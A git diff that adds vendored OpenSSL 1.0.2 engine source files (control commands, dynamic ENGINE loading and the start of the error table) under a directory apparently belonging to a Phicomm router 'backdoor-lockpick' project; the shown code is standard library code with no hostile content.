+    ENGINEerr(ENGINE_F_INT_CTRL_HELPER, ENGINE_R_INTERNAL_LIST_ERROR);
+    return -1;
+}
+
+int ENGINE_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void))
+{
+    int ctrl_exists, ref_exists;
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    ref_exists = ((e->struct_ref > 0) ? 1 : 0);
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    ctrl_exists = ((e->ctrl == NULL) ? 0 : 1);
+    if (!ref_exists) {
+        ENGINEerr(ENGINE_F_ENGINE_CTRL, ENGINE_R_NO_REFERENCE);
+        return 0;
+    }
+    /*
+     * Intercept any "root-level" commands before trying to hand them on to
+     * ctrl() handlers.
+     */
+    switch (cmd) {
+    case ENGINE_CTRL_HAS_CTRL_FUNCTION:
+        return ctrl_exists;
+    case ENGINE_CTRL_GET_FIRST_CMD_TYPE:
+    case ENGINE_CTRL_GET_NEXT_CMD_TYPE:
+    case ENGINE_CTRL_GET_CMD_FROM_NAME:
+    case ENGINE_CTRL_GET_NAME_LEN_FROM_CMD:
+    case ENGINE_CTRL_GET_NAME_FROM_CMD:
+    case ENGINE_CTRL_GET_DESC_LEN_FROM_CMD:
+    case ENGINE_CTRL_GET_DESC_FROM_CMD:
+    case ENGINE_CTRL_GET_CMD_FLAGS:
+        if (ctrl_exists && !(e->flags & ENGINE_FLAGS_MANUAL_CMD_CTRL))
+            return int_ctrl_helper(e, cmd, i, p, f);
+        if (!ctrl_exists) {
+            ENGINEerr(ENGINE_F_ENGINE_CTRL, ENGINE_R_NO_CONTROL_FUNCTION);
+            /*
+             * For these cmd-related functions, failure is indicated by a -1
+             * return value (because 0 is used as a valid return in some
+             * places).
+             */
+            return -1;
+        }
+    default:
+        break;
+    }
+    /* Anything else requires a ctrl() handler to exist. */
+    if (!ctrl_exists) {
+        ENGINEerr(ENGINE_F_ENGINE_CTRL, ENGINE_R_NO_CONTROL_FUNCTION);
+        return 0;
+    }
+    return e->ctrl(e, cmd, i, p, f);
+}
+
+int ENGINE_cmd_is_executable(ENGINE *e, int cmd)
+{
+    int flags;
+    if ((flags =
+         ENGINE_ctrl(e, ENGINE_CTRL_GET_CMD_FLAGS, cmd, NULL, NULL)) < 0) {
+        ENGINEerr(ENGINE_F_ENGINE_CMD_IS_EXECUTABLE,
+                  ENGINE_R_INVALID_CMD_NUMBER);
+        return 0;
+    }
+    if (!(flags & ENGINE_CMD_FLAG_NO_INPUT) &&
+        !(flags & ENGINE_CMD_FLAG_NUMERIC) &&
+        !(flags & ENGINE_CMD_FLAG_STRING))
+        return 0;
+    return 1;
+}
+
+int ENGINE_ctrl_cmd(ENGINE *e, const char *cmd_name,
+                    long i, void *p, void (*f) (void), int cmd_optional)
+{
+    int num;
+
+    if ((e == NULL) || (cmd_name == NULL)) {
+        ENGINEerr(ENGINE_F_ENGINE_CTRL_CMD, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if ((e->ctrl == NULL) || ((num = ENGINE_ctrl(e,
+                                                 ENGINE_CTRL_GET_CMD_FROM_NAME,
+                                                 0, (void *)cmd_name,
+                                                 NULL)) <= 0)) {
+        /*
+         * If the command didn't *have* to be supported, we fake success.
+         * This allows certain settings to be specified for multiple ENGINEs
+         * and only require a change of ENGINE id (without having to
+         * selectively apply settings). Eg. changing from a hardware device
+         * back to the regular software ENGINE without editing the config
+         * file, etc.
+         */
+        if (cmd_optional) {
+            ERR_clear_error();
+            return 1;
+        }
+        ENGINEerr(ENGINE_F_ENGINE_CTRL_CMD, ENGINE_R_INVALID_CMD_NAME);
+        return 0;
+    }
+    /*
+     * Force the result of the control command to 0 or 1, for the reasons
+     * mentioned before.
+     */
+    if (ENGINE_ctrl(e, num, i, p, f) > 0)
+        return 1;
+    return 0;
+}
+
+int ENGINE_ctrl_cmd_string(ENGINE *e, const char *cmd_name, const char *arg,
+                           int cmd_optional)
+{
+    int num, flags;
+    long l;
+    char *ptr;
+    if ((e == NULL) || (cmd_name == NULL)) {
+        ENGINEerr(ENGINE_F_ENGINE_CTRL_CMD_STRING,
+                  ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if ((e->ctrl == NULL) || ((num = ENGINE_ctrl(e,
+                                                 ENGINE_CTRL_GET_CMD_FROM_NAME,
+                                                 0, (void *)cmd_name,
+                                                 NULL)) <= 0)) {
+        /*
+         * If the command didn't *have* to be supported, we fake success.
+         * This allows certain settings to be specified for multiple ENGINEs
+         * and only require a change of ENGINE id (without having to
+         * selectively apply settings). Eg. changing from a hardware device
+         * back to the regular software ENGINE without editing the config
+         * file, etc.
+         */
+        if (cmd_optional) {
+            ERR_clear_error();
+            return 1;
+        }
+        ENGINEerr(ENGINE_F_ENGINE_CTRL_CMD_STRING, ENGINE_R_INVALID_CMD_NAME);
+        return 0;
+    }
+    if (!ENGINE_cmd_is_executable(e, num)) {
+        ENGINEerr(ENGINE_F_ENGINE_CTRL_CMD_STRING,
+                  ENGINE_R_CMD_NOT_EXECUTABLE);
+        return 0;
+    }
+    if ((flags =
+         ENGINE_ctrl(e, ENGINE_CTRL_GET_CMD_FLAGS, num, NULL, NULL)) < 0) {
+        /*
+         * Shouldn't happen, given that ENGINE_cmd_is_executable() returned
+         * success.
+         */
+        ENGINEerr(ENGINE_F_ENGINE_CTRL_CMD_STRING,
+                  ENGINE_R_INTERNAL_LIST_ERROR);
+        return 0;
+    }
+    /*
+     * If the command takes no input, there must be no input. And vice versa.
+     */
+    if (flags & ENGINE_CMD_FLAG_NO_INPUT) {
+        if (arg != NULL) {
+            ENGINEerr(ENGINE_F_ENGINE_CTRL_CMD_STRING,
+                      ENGINE_R_COMMAND_TAKES_NO_INPUT);
+            return 0;
+        }
+        /*
+         * We deliberately force the result of ENGINE_ctrl() to 0 or 1 rather
+         * than returning it as "return data". This is to ensure usage of
+         * these commands is consistent across applications and that certain
+         * applications don't understand it one way, and others another.
+         */
+        if (ENGINE_ctrl(e, num, 0, (void *)arg, NULL) > 0)
+            return 1;
+        return 0;
+    }
+    /* So, we require input */
+    if (arg == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_CTRL_CMD_STRING,
+                  ENGINE_R_COMMAND_TAKES_INPUT);
+        return 0;
+    }
+    /* If it takes string input, that's easy */
+    if (flags & ENGINE_CMD_FLAG_STRING) {
+        /* Same explanation as above */
+        if (ENGINE_ctrl(e, num, 0, (void *)arg, NULL) > 0)
+            return 1;
+        return 0;
+    }
+    /*
+     * If it doesn't take numeric either, then it is unsupported for use in a
+     * config-setting situation, which is what this function is for. This
+     * should never happen though, because ENGINE_cmd_is_executable() was
+     * used.
+     */
+    if (!(flags & ENGINE_CMD_FLAG_NUMERIC)) {
+        ENGINEerr(ENGINE_F_ENGINE_CTRL_CMD_STRING,
+                  ENGINE_R_INTERNAL_LIST_ERROR);
+        return 0;
+    }
+    l = strtol(arg, &ptr, 10);
+    if ((arg == ptr) || (*ptr != '\0')) {
+        ENGINEerr(ENGINE_F_ENGINE_CTRL_CMD_STRING,
+                  ENGINE_R_ARGUMENT_IS_NOT_A_NUMBER);
+        return 0;
+    }
+    /*
+     * Force the result of the control command to 0 or 1, for the reasons
+     * mentioned before.
+     */
+    if (ENGINE_ctrl(e, num, l, NULL, NULL) > 0)
+        return 1;
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_dyn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_dyn.c
new file mode 100644
index 0000000..3169b09
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_dyn.c
@@ -0,0 +1,568 @@
+/* crypto/engine/eng_dyn.c */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+#include <openssl/dso.h>
+
+/*
+ * Shared libraries implementing ENGINEs for use by the "dynamic" ENGINE
+ * loader should implement the hook-up functions with the following
+ * prototypes.
+ */
+
+/* Our ENGINE handlers */
+static int dynamic_init(ENGINE *e);
+static int dynamic_finish(ENGINE *e);
+static int dynamic_ctrl(ENGINE *e, int cmd, long i, void *p,
+                        void (*f) (void));
+/* Predeclare our context type */
+typedef struct st_dynamic_data_ctx dynamic_data_ctx;
+/* The implementation for the important control command */
+static int dynamic_load(ENGINE *e, dynamic_data_ctx *ctx);
+
+#define DYNAMIC_CMD_SO_PATH             ENGINE_CMD_BASE
+#define DYNAMIC_CMD_NO_VCHECK           (ENGINE_CMD_BASE + 1)
+#define DYNAMIC_CMD_ID                  (ENGINE_CMD_BASE + 2)
+#define DYNAMIC_CMD_LIST_ADD            (ENGINE_CMD_BASE + 3)
+#define DYNAMIC_CMD_DIR_LOAD            (ENGINE_CMD_BASE + 4)
+#define DYNAMIC_CMD_DIR_ADD             (ENGINE_CMD_BASE + 5)
+#define DYNAMIC_CMD_LOAD                (ENGINE_CMD_BASE + 6)
+
+/* The constants used when creating the ENGINE */
+static const char *engine_dynamic_id = "dynamic";
+static const char *engine_dynamic_name = "Dynamic engine loading support";
+static const ENGINE_CMD_DEFN dynamic_cmd_defns[] = {
+    {DYNAMIC_CMD_SO_PATH,
+     "SO_PATH",
+     "Specifies the path to the new ENGINE shared library",
+     ENGINE_CMD_FLAG_STRING},
+    {DYNAMIC_CMD_NO_VCHECK,
+     "NO_VCHECK",
+     "Specifies to continue even if version checking fails (boolean)",
+     ENGINE_CMD_FLAG_NUMERIC},
+    {DYNAMIC_CMD_ID,
+     "ID",
+     "Specifies an ENGINE id name for loading",
+     ENGINE_CMD_FLAG_STRING},
+    {DYNAMIC_CMD_LIST_ADD,
+     "LIST_ADD",
+     "Whether to add a loaded ENGINE to the internal list (0=no,1=yes,2=mandatory)",
+     ENGINE_CMD_FLAG_NUMERIC},
+    {DYNAMIC_CMD_DIR_LOAD,
+     "DIR_LOAD",
+     "Specifies whether to load from 'DIR_ADD' directories (0=no,1=yes,2=mandatory)",
+     ENGINE_CMD_FLAG_NUMERIC},
+    {DYNAMIC_CMD_DIR_ADD,
+     "DIR_ADD",
+     "Adds a directory from which ENGINEs can be loaded",
+     ENGINE_CMD_FLAG_STRING},
+    {DYNAMIC_CMD_LOAD,
+     "LOAD",
+     "Load up the ENGINE specified by other settings",
+     ENGINE_CMD_FLAG_NO_INPUT},
+    {0, NULL, NULL, 0}
+};
+
+/*
+ * Loading code stores state inside the ENGINE structure via the "ex_data"
+ * element. We load all our state into a single structure and use that as a
+ * single context in the "ex_data" stack.
+ */
+struct st_dynamic_data_ctx {
+    /* The DSO object we load that supplies the ENGINE code */
+    DSO *dynamic_dso;
+    /*
+     * The function pointer to the version checking shared library function
+     */
+    dynamic_v_check_fn v_check;
+    /*
+     * The function pointer to the engine-binding shared library function
+     */
+    dynamic_bind_engine bind_engine;
+    /* The default name/path for loading the shared library */
+    const char *DYNAMIC_LIBNAME;
+    /* Whether to continue loading on a version check failure */
+    int no_vcheck;
+    /* If non-NULL, stipulates the 'id' of the ENGINE to be loaded */
+    const char *engine_id;
+    /*
+     * If non-zero, a successfully loaded ENGINE should be added to the
+     * internal ENGINE list. If 2, the add must succeed or the entire load
+     * should fail.
+     */
+    int list_add_value;
+    /* The symbol name for the version checking function */
+    const char *DYNAMIC_F1;
+    /* The symbol name for the "initialise ENGINE structure" function */
+    const char *DYNAMIC_F2;
+    /*
+     * Whether to never use 'dirs', use 'dirs' as a fallback, or only use
+     * 'dirs' for loading. Default is to use 'dirs' as a fallback.
+     */
+    int dir_load;
+    /* A stack of directories from which ENGINEs could be loaded */
+    STACK_OF(OPENSSL_STRING) *dirs;
+};
+
+/*
+ * This is the "ex_data" index we obtain and reserve for use with our context
+ * structure.
+ */
+static int dynamic_ex_data_idx = -1;
+
+static void int_free_str(char *s)
+{
+    OPENSSL_free(s);
+}
+
+/*
+ * Because our ex_data element may or may not get allocated depending on
+ * whether a "first-use" occurs before the ENGINE is freed, we have a memory
+ * leak problem to solve. We can't declare a "new" handler for the ex_data as
+ * we don't want a dynamic_data_ctx in *all* ENGINE structures of all types
+ * (this is a bug in the design of CRYPTO_EX_DATA). As such, we just declare
+ * a "free" handler and that will get called if an ENGINE is being destroyed
+ * and there was an ex_data element corresponding to our context type.
+ */
+static void dynamic_data_ctx_free_func(void *parent, void *ptr,
+                                       CRYPTO_EX_DATA *ad, int idx, long argl,
+                                       void *argp)
+{
+    if (ptr) {
+        dynamic_data_ctx *ctx = (dynamic_data_ctx *)ptr;
+        if (ctx->dynamic_dso)
+            DSO_free(ctx->dynamic_dso);
+        if (ctx->DYNAMIC_LIBNAME)
+            OPENSSL_free((void *)ctx->DYNAMIC_LIBNAME);
+        if (ctx->engine_id)
+            OPENSSL_free((void *)ctx->engine_id);
+        if (ctx->dirs)
+            sk_OPENSSL_STRING_pop_free(ctx->dirs, int_free_str);
+        OPENSSL_free(ctx);
+    }
+}
+
+/*
+ * Construct the per-ENGINE context. We create it blindly and then use a lock
+ * to check for a race - if so, all but one of the threads "racing" will have
+ * wasted their time. The alternative involves creating everything inside the
+ * lock which is far worse.
+ */
+static int dynamic_set_data_ctx(ENGINE *e, dynamic_data_ctx **ctx)
+{
+    dynamic_data_ctx *c;
+    c = OPENSSL_malloc(sizeof(dynamic_data_ctx));
+    if (!c) {
+        ENGINEerr(ENGINE_F_DYNAMIC_SET_DATA_CTX, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    memset(c, 0, sizeof(dynamic_data_ctx));
+    c->dynamic_dso = NULL;
+    c->v_check = NULL;
+    c->bind_engine = NULL;
+    c->DYNAMIC_LIBNAME = NULL;
+    c->no_vcheck = 0;
+    c->engine_id = NULL;
+    c->list_add_value = 0;
+    c->DYNAMIC_F1 = "v_check";
+    c->DYNAMIC_F2 = "bind_engine";
+    c->dir_load = 1;
+    c->dirs = sk_OPENSSL_STRING_new_null();
+    if (!c->dirs) {
+        ENGINEerr(ENGINE_F_DYNAMIC_SET_DATA_CTX, ERR_R_MALLOC_FAILURE);
+        OPENSSL_free(c);
+        return 0;
+    }
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    if ((*ctx = (dynamic_data_ctx *)ENGINE_get_ex_data(e,
+                                                       dynamic_ex_data_idx))
+        == NULL) {
+        /* Good, we're the first */
+        ENGINE_set_ex_data(e, dynamic_ex_data_idx, c);
+        *ctx = c;
+        c = NULL;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    /*
+     * If we lost the race to set the context, c is non-NULL and *ctx is the
+     * context of the thread that won.
+     */
+    if (c)
+        OPENSSL_free(c);
+    return 1;
+}
+
+/*
+ * This function retrieves the context structure from an ENGINE's "ex_data",
+ * or if it doesn't exist yet, sets it up.
+ */
+static dynamic_data_ctx *dynamic_get_data_ctx(ENGINE *e)
+{
+    dynamic_data_ctx *ctx;
+    if (dynamic_ex_data_idx < 0) {
+        /*
+         * Create and register the ENGINE ex_data, and associate our "free"
+         * function with it to ensure any allocated contexts get freed when
+         * an ENGINE goes underground.
+         */
+        int new_idx = ENGINE_get_ex_new_index(0, NULL, NULL, NULL,
+                                              dynamic_data_ctx_free_func);
+        if (new_idx == -1) {
+            ENGINEerr(ENGINE_F_DYNAMIC_GET_DATA_CTX, ENGINE_R_NO_INDEX);
+            return NULL;
+        }
+        CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+        /* Avoid a race by checking again inside this lock */
+        if (dynamic_ex_data_idx < 0) {
+            /* Good, someone didn't beat us to it */
+            dynamic_ex_data_idx = new_idx;
+            new_idx = -1;
+        }
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        /*
+         * In theory we could "give back" the index here if (new_idx>-1), but
+         * it's not possible and wouldn't gain us much if it were.
+         */
+    }
+    ctx = (dynamic_data_ctx *)ENGINE_get_ex_data(e, dynamic_ex_data_idx);
+    /* Check if the context needs to be created */
+    if ((ctx == NULL) && !dynamic_set_data_ctx(e, &ctx))
+        /* "set_data" will set errors if necessary */
+        return NULL;
+    return ctx;
+}
+
+static ENGINE *engine_dynamic(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!ENGINE_set_id(ret, engine_dynamic_id) ||
+        !ENGINE_set_name(ret, engine_dynamic_name) ||
+        !ENGINE_set_init_function(ret, dynamic_init) ||
+        !ENGINE_set_finish_function(ret, dynamic_finish) ||
+        !ENGINE_set_ctrl_function(ret, dynamic_ctrl) ||
+        !ENGINE_set_flags(ret, ENGINE_FLAGS_BY_ID_COPY) ||
+        !ENGINE_set_cmd_defns(ret, dynamic_cmd_defns)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_dynamic(void)
+{
+    ENGINE *toadd = engine_dynamic();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    /*
+     * If the "add" worked, it gets a structural reference. So either way, we
+     * release our just-created reference.
+     */
+    ENGINE_free(toadd);
+    /*
+     * If the "add" didn't work, it was probably a conflict because it was
+     * already added (eg. someone calling ENGINE_load_blah then calling
+     * ENGINE_load_builtin_engines() perhaps).
+     */
+    ERR_clear_error();
+}
+
+static int dynamic_init(ENGINE *e)
+{
+    /*
+     * We always return failure - the "dyanamic" engine itself can't be used
+     * for anything.
+     */
+    return 0;
+}
+
+static int dynamic_finish(ENGINE *e)
+{
+    /*
+     * This should never be called on account of "dynamic_init" always
+     * failing.
+     */
+    return 0;
+}
+
+static int dynamic_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void))
+{
+    dynamic_data_ctx *ctx = dynamic_get_data_ctx(e);
+    int initialised;
+
+    if (!ctx) {
+        ENGINEerr(ENGINE_F_DYNAMIC_CTRL, ENGINE_R_NOT_LOADED);
+        return 0;
+    }
+    initialised = ((ctx->dynamic_dso == NULL) ? 0 : 1);
+    /* All our control commands require the ENGINE to be uninitialised */
+    if (initialised) {
+        ENGINEerr(ENGINE_F_DYNAMIC_CTRL, ENGINE_R_ALREADY_LOADED);
+        return 0;
+    }
+    switch (cmd) {
+    case DYNAMIC_CMD_SO_PATH:
+        /* a NULL 'p' or a string of zero-length is the same thing */
+        if (p && (strlen((const char *)p) < 1))
+            p = NULL;
+        if (ctx->DYNAMIC_LIBNAME)
+            OPENSSL_free((void *)ctx->DYNAMIC_LIBNAME);
+        if (p)
+            ctx->DYNAMIC_LIBNAME = BUF_strdup(p);
+        else
+            ctx->DYNAMIC_LIBNAME = NULL;
+        return (ctx->DYNAMIC_LIBNAME ? 1 : 0);
+    case DYNAMIC_CMD_NO_VCHECK:
+        ctx->no_vcheck = ((i == 0) ? 0 : 1);
+        return 1;
+    case DYNAMIC_CMD_ID:
+        /* a NULL 'p' or a string of zero-length is the same thing */
+        if (p && (strlen((const char *)p) < 1))
+            p = NULL;
+        if (ctx->engine_id)
+            OPENSSL_free((void *)ctx->engine_id);
+        if (p)
+            ctx->engine_id = BUF_strdup(p);
+        else
+            ctx->engine_id = NULL;
+        return (ctx->engine_id ? 1 : 0);
+    case DYNAMIC_CMD_LIST_ADD:
+        if ((i < 0) || (i > 2)) {
+            ENGINEerr(ENGINE_F_DYNAMIC_CTRL, ENGINE_R_INVALID_ARGUMENT);
+            return 0;
+        }
+        ctx->list_add_value = (int)i;
+        return 1;
+    case DYNAMIC_CMD_LOAD:
+        return dynamic_load(e, ctx);
+    case DYNAMIC_CMD_DIR_LOAD:
+        if ((i < 0) || (i > 2)) {
+            ENGINEerr(ENGINE_F_DYNAMIC_CTRL, ENGINE_R_INVALID_ARGUMENT);
+            return 0;
+        }
+        ctx->dir_load = (int)i;
+        return 1;
+    case DYNAMIC_CMD_DIR_ADD:
+        /* a NULL 'p' or a string of zero-length is the same thing */
+        if (!p || (strlen((const char *)p) < 1)) {
+            ENGINEerr(ENGINE_F_DYNAMIC_CTRL, ENGINE_R_INVALID_ARGUMENT);
+            return 0;
+        }
+        {
+            char *tmp_str = BUF_strdup(p);
+            if (!tmp_str) {
+                ENGINEerr(ENGINE_F_DYNAMIC_CTRL, ERR_R_MALLOC_FAILURE);
+                return 0;
+            }
+            sk_OPENSSL_STRING_insert(ctx->dirs, tmp_str, -1);
+        }
+        return 1;
+    default:
+        break;
+    }
+    ENGINEerr(ENGINE_F_DYNAMIC_CTRL, ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED);
+    return 0;
+}
+
+static int int_load(dynamic_data_ctx *ctx)
+{
+    int num, loop;
+    /* Unless told not to, try a direct load */
+    if ((ctx->dir_load != 2) && (DSO_load(ctx->dynamic_dso,
+                                          ctx->DYNAMIC_LIBNAME, NULL,
+                                          0)) != NULL)
+        return 1;
+    /* If we're not allowed to use 'dirs' or we have none, fail */
+    if (!ctx->dir_load || (num = sk_OPENSSL_STRING_num(ctx->dirs)) < 1)
+        return 0;
+    for (loop = 0; loop < num; loop++) {
+        const char *s = sk_OPENSSL_STRING_value(ctx->dirs, loop);
+        char *merge = DSO_merge(ctx->dynamic_dso, ctx->DYNAMIC_LIBNAME, s);
+        if (!merge)
+            return 0;
+        if (DSO_load(ctx->dynamic_dso, merge, NULL, 0)) {
+            /* Found what we're looking for */
+            OPENSSL_free(merge);
+            return 1;
+        }
+        OPENSSL_free(merge);
+    }
+    return 0;
+}
+
+static int dynamic_load(ENGINE *e, dynamic_data_ctx *ctx)
+{
+    ENGINE cpy;
+    dynamic_fns fns;
+
+    if (!ctx->dynamic_dso)
+        ctx->dynamic_dso = DSO_new();
+    if (!ctx->DYNAMIC_LIBNAME) {
+        if (!ctx->engine_id)
+            return 0;
+        ctx->DYNAMIC_LIBNAME =
+            DSO_convert_filename(ctx->dynamic_dso, ctx->engine_id);
+    }
+    if (!int_load(ctx)) {
+        ENGINEerr(ENGINE_F_DYNAMIC_LOAD, ENGINE_R_DSO_NOT_FOUND);
+        DSO_free(ctx->dynamic_dso);
+        ctx->dynamic_dso = NULL;
+        return 0;
+    }
+    /* We have to find a bind function otherwise it'll always end badly */
+    if (!
+        (ctx->bind_engine =
+         (dynamic_bind_engine) DSO_bind_func(ctx->dynamic_dso,
+                                             ctx->DYNAMIC_F2))) {
+        ctx->bind_engine = NULL;
+        DSO_free(ctx->dynamic_dso);
+        ctx->dynamic_dso = NULL;
+        ENGINEerr(ENGINE_F_DYNAMIC_LOAD, ENGINE_R_DSO_FAILURE);
+        return 0;
+    }
+    /* Do we perform version checking? */
+    if (!ctx->no_vcheck) {
+        unsigned long vcheck_res = 0;
+        /*
+         * Now we try to find a version checking function and decide how to
+         * cope with failure if/when it fails.
+         */
+        ctx->v_check =
+            (dynamic_v_check_fn) DSO_bind_func(ctx->dynamic_dso,
+                                               ctx->DYNAMIC_F1);
+        if (ctx->v_check)
+            vcheck_res = ctx->v_check(OSSL_DYNAMIC_VERSION);
+        /*
+         * We fail if the version checker veto'd the load *or* if it is
+         * deferring to us (by returning its version) and we think it is too
+         * old.
+         */
+        if (vcheck_res < OSSL_DYNAMIC_OLDEST) {
+            /* Fail */
+            ctx->bind_engine = NULL;
+            ctx->v_check = NULL;
+            DSO_free(ctx->dynamic_dso);
+            ctx->dynamic_dso = NULL;
+            ENGINEerr(ENGINE_F_DYNAMIC_LOAD,
+                      ENGINE_R_VERSION_INCOMPATIBILITY);
+            return 0;
+        }
+    }
+    /*
+     * First binary copy the ENGINE structure so that we can roll back if the
+     * hand-over fails
+     */
+    memcpy(&cpy, e, sizeof(ENGINE));
+    /*
+     * Provide the ERR, "ex_data", memory, and locking callbacks so the
+     * loaded library uses our state rather than its own. FIXME: As noted in
+     * engine.h, much of this would be simplified if each area of code
+     * provided its own "summary" structure of all related callbacks. It
+     * would also increase opaqueness.
+     */
+    fns.static_state = ENGINE_get_static_state();
+    fns.err_fns = ERR_get_implementation();
+    fns.ex_data_fns = CRYPTO_get_ex_data_implementation();
+    CRYPTO_get_mem_functions(&fns.mem_fns.malloc_cb,
+                             &fns.mem_fns.realloc_cb, &fns.mem_fns.free_cb);
+    fns.lock_fns.lock_locking_cb = CRYPTO_get_locking_callback();
+    fns.lock_fns.lock_add_lock_cb = CRYPTO_get_add_lock_callback();
+    fns.lock_fns.dynlock_create_cb = CRYPTO_get_dynlock_create_callback();
+    fns.lock_fns.dynlock_lock_cb = CRYPTO_get_dynlock_lock_callback();
+    fns.lock_fns.dynlock_destroy_cb = CRYPTO_get_dynlock_destroy_callback();
+    /*
+     * Now that we've loaded the dynamic engine, make sure no "dynamic"
+     * ENGINE elements will show through.
+     */
+    engine_set_all_null(e);
+
+    /* Try to bind the ENGINE onto our own ENGINE structure */
+    if (!ctx->bind_engine(e, ctx->engine_id, &fns)) {
+        ctx->bind_engine = NULL;
+        ctx->v_check = NULL;
+        DSO_free(ctx->dynamic_dso);
+        ctx->dynamic_dso = NULL;
+        ENGINEerr(ENGINE_F_DYNAMIC_LOAD, ENGINE_R_INIT_FAILED);
+        /* Copy the original ENGINE structure back */
+        memcpy(e, &cpy, sizeof(ENGINE));
+        return 0;
+    }
+    /* Do we try to add this ENGINE to the internal list too? */
+    if (ctx->list_add_value > 0) {
+        if (!ENGINE_add(e)) {
+            /* Do we tolerate this or fail? */
+            if (ctx->list_add_value > 1) {
+                /*
+                 * Fail - NB: By this time, it's too late to rollback, and
+                 * trying to do so allows the bind_engine() code to have
+                 * created leaks. We just have to fail where we are, after
+                 * the ENGINE has changed.
+                 */
+                ENGINEerr(ENGINE_F_DYNAMIC_LOAD,
+                          ENGINE_R_CONFLICTING_ENGINE_ID);
+                return 0;
+            }
+            /* Tolerate */
+            ERR_clear_error();
+        }
+    }
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_err.c
new file mode 100644
index 0000000..bcc2348
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_err.c
@@ -0,0 +1,181 @@
+/* crypto/engine/eng_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2010 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
